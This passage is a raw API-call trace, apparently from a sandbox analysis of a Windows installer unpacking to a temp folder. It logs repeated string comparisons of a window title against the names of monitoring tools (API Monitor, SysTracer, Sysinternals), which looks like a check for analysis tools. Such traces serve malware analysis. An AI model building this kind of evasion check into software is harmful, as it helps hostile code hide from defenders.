returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.442] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.442] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.442] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.442] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.442] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.442] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.442] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] strstr (_Str="Network Flyout", _SubStr="- main thread") returned 0x0 [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.443] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.443] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") 
returned="0" [0158.443] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrlenA (lpString="0") returned 1 [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.443] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.443] lstrlenA (lpString="0") returned 1 [0158.443] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrlenA (lpString="Network Flyout") returned 14 [0158.443] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.443] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") 
returned="3399936" [0158.444] lstrlenA (lpString="3399936") returned 7 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") 
returned="Network Flyout" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrlenA (lpString="") returned 0 [0158.444] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.444] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.444] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.444] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.444] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.445] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.445] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.445] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.445] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.445] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.445] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.445] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.445] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.445] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.445] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.445] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network 
Flyout" [0158.445] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] strstr (_Str="Network Flyout", _SubStr="API Monitor") returned 0x0 [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.446] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.446] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.446] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.446] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.446] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrlenA (lpString="0") returned 1 [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", 
iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.448] lstrlenA (lpString="0") returned 1 [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.448] lstrlenA (lpString="Network Flyout") returned 14 [0158.448] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrlenA (lpString="3399936") returned 7 [0158.448] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.449] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.449] lstrcpynA (in: lpString1=0x40a418, 
lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.449] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.449] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.450] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.450] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.450] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.450] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.450] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.450] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.450] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.450] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.450] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.450] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.450] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.450] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.450] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] strstr (_Str="Network Flyout", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") 
returned="Blue Project Software SysTracer" [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.451] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.451] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrlenA (lpString="0") returned 1 [0158.451] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrlenA (lpString="0") returned 1 [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrlenA (lpString="Network Flyout") returned 14 [0158.452] lstrcpynA (in: 
lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrlenA (lpString="3399936") returned 7 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrlenA (lpString="") returned 0 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" 
[0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrlenA (lpString="") returned 0 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrlenA (lpString="") returned 0 [0158.453] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: 
lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.453] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.453] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.454] 